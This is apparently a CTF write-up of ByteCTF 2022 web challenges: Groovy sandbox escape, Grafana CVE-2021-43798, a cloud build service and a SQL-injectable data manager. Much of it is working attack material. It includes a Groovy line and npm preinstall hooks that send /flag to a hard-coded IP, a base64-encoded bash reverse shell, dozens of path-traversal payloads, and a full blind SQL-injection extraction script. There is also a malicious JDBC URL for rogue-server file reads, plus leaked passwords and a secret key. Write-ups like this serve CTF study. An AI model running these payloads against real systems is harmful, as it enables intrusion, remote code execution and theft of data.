easy_groovy

// Groovy sandbox escape payload: read the flag file and exfiltrate it as a
// query parameter to an attacker-controlled host (the flag is not URL-encoded,
// which is fine for the usual flag{...} character set).
String aa = new File("/flag").text
def res1 = new URL('http://116.62.240.148:7077?a=' + aa).text;

easy_grafana

Version 8.2.6 has a known vulnerability (CVE-2021-43798, unauthenticated path traversal through the plugin static-file handler, fixed in 8.3.1 and the 8.0.7 / 8.1.8 / 8.2.7 backports):

CVE-2021-43798: Grafana arbitrary file read vulnerability - Tencent Cloud Developer Community (tencent.com)

Analysis and summary of the Grafana file read vulnerability (CVE-2021-43798) - 斗象能力中心

Reproducing the Grafana arbitrary file read vulnerability (CVE-2021-43798) - xzhome's blog - CSDN

Affected plugins (any plugin ID under /public/plugins/ works; the eight ../ climb from the plugin's directory up to the filesystem root):

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd


GET /public/plugins/text/#/../../../../../../../../../../etc/passwd HTTP/1.1
Host: c874aa39d7f9b70cfc97b964cee72ca5.2022.capturetheflag.fun
Cookie: __t_id=9d390487baa727875304965b05e864f7; redirect_to=%2F
Sec-Ch-Ua: "Microsoft Edge";v="105", " Not;A Brand";v="99", "Chromium";v="105"
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50
Sec-Ch-Ua-Platform: "Windows"
Origin: https://c874aa39d7f9b70cfc97b964cee72ca5.2022.capturetheflag.fun
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://c874aa39d7f9b70cfc97b964cee72ca5.2022.capturetheflag.fun/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
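To see why the payloads in the list need exactly eight ../ and why the request above, with ten, still lands on /etc/passwd, here is an added Go example (my own code, not Grafana's source): a reconstruction of the weak resolve step behind CVE-2021-43798 next to a hardened version. The plugin directory path is an assumption made for illustration (a core panel plugin lives eight levels below / in a default install).

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Assumed on-disk location of the core "text" panel plugin; depth 8 below "/",
// which is why the traversal payloads in the list above use eight "../".
const textPluginDir = "/usr/share/grafana/public/app/plugins/panel/text"

// vulnerableResolve mirrors the weakness behind CVE-2021-43798: the requested
// file name is cleaned, but filepath.Clean keeps leading ".." elements, so
// joining it onto the plugin directory can leave that directory.
// Illustrative reconstruction, not Grafana's actual code.
func vulnerableResolve(pluginDir, requested string) string {
	return filepath.Join(pluginDir, filepath.Clean(requested))
}

// safeResolve roots the request at "/" before cleaning, which discards any
// ".." that would climb above the root, then double-checks containment.
// ok is false when the result would not be strictly inside pluginDir.
func safeResolve(pluginDir, requested string) (string, bool) {
	rel := filepath.Clean("/" + requested) // "/../../etc/passwd" -> "/etc/passwd"
	full := filepath.Join(pluginDir, rel)  // now always below pluginDir
	root := filepath.Clean(pluginDir) + string(filepath.Separator)
	if !strings.HasPrefix(full, root) {
		return "", false
	}
	return full, true
}

func main() {
	for _, req := range []string{
		"module.js",
		"../../../../../../../../etc/passwd",         // eight levels: the payload from the list
		"#/../../../../../../../../../../etc/passwd", // the request above: surplus ".." are absorbed at "/"
	} {
		v := vulnerableResolve(textPluginDir, req)
		s, ok := safeResolve(textPluginDir, req)
		fmt.Printf("%-45s vulnerable=%s safe=%s ok=%v\n", req, v, s, ok)
	}
}
```

With the vulnerable join, the "#" in the request is just one more directory element that the next ".." cancels, so any number of levels at or above eight reaches the root. The rooted clean is the lexical fix; on top of it, serving only files listed in the plugin's manifest or opening them relative to a directory handle closes the symlink variants that lexical checks cannot see.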


Read the config file

GET /public/plugins/text/#/../../../../../../../../../../etc/grafana/grafana.ini HTTP/1.1
secret_key = SW2YcwTIb9zpO1hoPsMm


/public/plugins/text/#/../../../../../../../../../../usr/share/grafana/conf/defaults.ini


Couldn't log in with that, so read the database instead: /var/lib/grafana/grafana.db


jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability (github.com)

AES-decrypt the stored password with the secret_key obtained earlier to get the flag.


ctf_cloud


Then log in as user admin with password 1.


File upload: upload a package.json whose preinstall script exfiltrates the flag.

{
"name": "sk1y",
"version": "0.0.1",
"scripts": {
"preinstall": "bash -c 'curl http://ip:7007/ -F --file=@/flag'"
}
}


Add the dependency, pointing it at the upload directory:

{"dependencies":{"sk1y": "file:./public/uploads/"}}


Start a listener on the port, then click build. npm runs a dependency's preinstall/install/postinstall scripts during install, for file: and git dependencies too, unless it is invoked with --ignore-scripts, so a package.json alone is enough to get code execution here.


Or get a reverse shell instead, by setting the dependency's package.json to the following (the base64 decodes to bash -i >& /dev/tcp/116.62.240.148/7007 0>&1):

{
"name": "sk1y",
"version": "0.0.1",
"scripts": {
"preinstall": "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMjQwLjE0OC83MDA3IDA+JjE=|base64 -d|bash"
}
}


Alternatively, skip the file upload feature altogether: following the W&M team's writeup, put the package.json in a public GitHub repository.

First push a package.json to the GitHub repo, then POST the dependency pointing at it.


Then run the build as the admin user.


datamanager

Register any account and log in; the order parameter at /dashboard?order=id is concatenated into an ORDER BY clause and is SQL-injectable. The injection is blind: the payload wraps the test in CASE WHEN ... THEN 1 ELSE 9223372036854775807+1 END, so a true condition sorts normally and returns 200, while a false one evaluates the BIGINT overflow, raises a database error, and the page no longer returns 200. The script walks the result one character at a time with LIKE 'prefix<char>%' given as a hex literal.

Pasting the W&M team's script:

import string
import warnings

import requests

warnings.filterwarnings("ignore")

session = requests.Session()
proxies = {}

headers = {
    "Cookie": "__t_id=7267900aaba9b607c88b9639ae26899a; JSESSIONID=C1032349BC4000AE184AD31889B5B0F3",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
}

# Boolean oracle: a true LIKE makes the CASE yield 1 (page returns 200); a false one
# evaluates 9223372036854775807+1, a BIGINT out-of-range error, and the page does not.
# Each stage below overwrote `url`; the last assignment is the one that runs.

# database() == datamanager
url = "https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id and case when (database() like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

# tables: source,users
url = "https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id and case when ((select group_concat(table_name) from information_schema.tables where table_schema like 0x646174616d616e61676572) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

# columns from users: current\\_connections,total\\_connections,user,id,n4me,pas$word
url = "https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id and case when ((select group_concat(column_name) from information_schema.columns where table_name like 0x7573657273) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

# n4me from users: ctf,...
url = "https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id and case when ((select group_concat(n4me) from users) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"

# pas$word from users: ctf@BvteDaNceS3cRet,...
url = "https://b9cf435899298a5ccde1a16acc13260e.2022.capturetheflag.fun/dashboard?order=id and case when ((select group_concat(pas$word) from users) like PAYLOAD) then 1 else 9223372036854775807%2B1 end"


def main():
    flag = ""
    while 1:
        success = False
        for i in string.printable[:-6]:  # drop the trailing whitespace characters
            if i in "_%[]":  # escape LIKE metacharacters before they go into the pattern
                i = "\\\\" + i
            # Build the pattern as a hex literal: known prefix + candidate char + '%'
            payload = "0x"
            for item in flag:
                payload += "%02x" % ord(item)
            for item in i:
                payload += "%02x" % ord(item)
            payload += "25"  # '%'
            # print(payload)
            r = session.get(url.replace("PAYLOAD", payload), proxies=proxies, headers=headers, verify=False, timeout=3)
            # if "SORRY!" not in r.text:
            if r.status_code == 200:
                flag += i
                print(flag)
                success = True
                break
        if success:
            continue
        # No candidate matched: the value is complete (or the oracle broke); stop here.
        print("failed", flag)
        raise Exception("failed")


if __name__ == "__main__":
    main()

The injection yields a username and password:

ctf
ctf@BvteDaNceS3cRet

The status page executes arbitrary SQL statements against the backing MySQL:


select database();
Result: [[datamanager]]

select version();
Result: [[8.0.30]]

select group_concat(table_name) from information_schema.tables;
Result: [[source,users,ADMINISTRABLE_ROLE_AUTHORIZATIONS,APPLICABLE_ROLES,CHARACTER_SETS,CHECK_CONSTRAINTS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMNS_EXTENSIONS,COLUMN_PRIVILEGES,COLUMN_STATISTICS,ENABLED_ROLES,ENGINES,EVENTS,FILES,INNODB_BUFFER_PAGE,INNODB_BUFFER_PAGE_LRU,INNODB_BUFFER_POOL_STATS,INNODB_CACHED_INDEXES,INNODB_CMP,INNODB_CMPMEM,INNODB_CMPMEM_RESET,INNODB_CMP_PER_INDEX,INNODB_CMP_PER_INDEX_RESET,INNODB_CMP_RESET,INNODB_COLUMNS,INNODB_DATAFILES,INNODB_FIELDS,INNODB_FOREIGN,INNODB_FOREIGN_COLS,INNODB_FT_BEING_DELETED,INNODB_FT_CONFIG,INNODB_FT_DEFAULT_STOPWORD,INNODB_FT_DELETED,INNODB_FT_INDEX_CACHE,INNODB_FT_INDEX_TABLE,INNODB_INDEXES,INNODB_METRICS,INNODB_SESSION_TEMP_TABLESPACES,INNODB_TABLES,INNODB_TABLESPACES,INNODB_TABLESPACES_BRIEF,INNODB_TABLESTATS,INNODB_TEMP_TABLE_INFO,INNODB_TRX,INNODB_VIRTUAL,KEYWORDS,KEY_COLUMN_USAGE,OPTIMIZER_TRACE,PARAMETERS,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,RESOURCE_GROUPS,ROLE_COLUMN_GRANTS,ROLE_ROUTINE_GRANTS,ROLE_TABLE]]

select * from source;
Result: [[1, 1, public mysql server, -, 3306, mysql, Running, root, mySql_Super_Str0ng_paSSw0rb], [2, 1, internal cache server, ***, ***, redis, Running, -, redis_means_Remote_D1ctionary_Server]]

show variables;
...[secure_file_priv, /tmp/]...


The connection test opens a JDBC connection using an attacker-supplied URL. Since secure_file_priv is /tmp/ on the database side, LOAD_FILE() and INTO OUTFILE cannot reach the flag from within MySQL, so the file has to be read on the JDBC client side instead.

Use a fake MySQL server to read the file. Line 72 of mysqlproto/protocol/handshake.py needs d[2] changed to 0x21 (charset id 33, utf8_general_ci, presumably the character-set byte of the server handshake), otherwise the client errors out.


But I didn't manage to reproduce the W&M team's netdoc approach.


url=jdbc:mysql://ip:7007/jdbc?allowLoadLocalInfile=true&maxAllowedPacket=655360&allowUrlInLocalInfile=true&username=fileread_/very_Str4nge_NamE_of_flag&password=5
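What the fake server does on the wire, as an added Go example (my own code, not the fake server's and not Connector/J's): both sides of the LOAD DATA LOCAL INFILE exchange that allowLoadLocalInfile=true exposes. After the handshake, the driver sends its first query; instead of a result set the rogue server answers with a 0xFB packet naming the file it wants (the fake server takes the name from the username, here /very_Str4nge_NamE_of_flag), and a permissive client uploads that file in packets terminated by an empty packet. The file content is constructed for the demo.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

// MySQL packet framing: 3-byte little-endian payload length, 1-byte sequence id, payload.
func packet(seq byte, payload []byte) []byte {
	n := len(payload)
	hdr := []byte{byte(n), byte(n >> 8), byte(n >> 16), seq}
	return append(hdr, payload...)
}

// readPacket splits one packet off the front of buf.
func readPacket(buf []byte) (seq byte, payload, rest []byte, err error) {
	if len(buf) < 4 {
		return 0, nil, nil, errors.New("short header")
	}
	n := int(buf[0]) | int(buf[1])<<8 | int(buf[2])<<16
	if len(buf) < 4+n {
		return 0, nil, nil, errors.New("short packet")
	}
	return buf[3], buf[4 : 4+n], buf[4+n:], nil
}

// localInfileRequest is the packet a rogue server sends in place of a result
// set for the client's first query: 0xFB followed by the file it wants. The
// client never issued a LOAD DATA statement; the server simply claims it did.
func localInfileRequest(seq byte, filename string) []byte {
	return packet(seq, append([]byte{0xFB}, filename...))
}

// parseLocalInfileRequest is the client-side decode of that packet.
func parseLocalInfileRequest(payload []byte) (string, error) {
	if len(payload) == 0 || payload[0] != 0xFB {
		return "", errors.New("not a LOCAL INFILE request")
	}
	return string(payload[1:]), nil
}

// clientUpload is what a client with local-infile enabled answers: the file
// content in one or more packets, then an empty packet as end-of-file marker.
func clientUpload(seq byte, content []byte, chunk int) []byte {
	var out []byte
	for len(content) > 0 {
		n := chunk
		if n > len(content) {
			n = len(content)
		}
		out = append(out, packet(seq, content[:n])...)
		content = content[n:]
		seq++
	}
	return append(out, packet(seq, nil)...)
}

// serverCollect reassembles the upload on the rogue server until the empty packet.
func serverCollect(stream []byte) ([]byte, error) {
	var file bytes.Buffer
	for {
		_, payload, rest, err := readPacket(stream)
		if err != nil {
			return nil, err
		}
		if len(payload) == 0 {
			return file.Bytes(), nil
		}
		file.Write(payload)
		stream = rest
	}
}

func main() {
	// Sequence ids: the client's COM_QUERY is 0, the server's reply 1, the upload starts at 2.
	req := localInfileRequest(1, "/very_Str4nge_NamE_of_flag")
	_, payload, _, _ := readPacket(req)
	name, _ := parseLocalInfileRequest(payload)
	flag := []byte("ByteCTF{constructed-example-content}") // constructed file content
	got, _ := serverCollect(clientUpload(2, flag, 8))
	fmt.Printf("server asked for %q and received %q\n", name, got)
}
```

The JDBC URL above turns this on with allowLoadLocalInfile=true; allowUrlInLocalInfile=true additionally lets the "filename" be a URL resolved through Java's URL handlers, which is what the netdoc variant relies on. Connector/J 8.x ships with allowLoadLocalInfile off by default, so an application that lets users supply a full JDBC URL, as this connection test does, hands the attacker the switch.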


References:

  1. ByteCTF 2022 By W&M - W&M Team (wm-team.cn)

  2. EDISEC team's writeup: https://mp.weixin.qq.com/s/kLmQLCCbByQ15LgGWeHk3g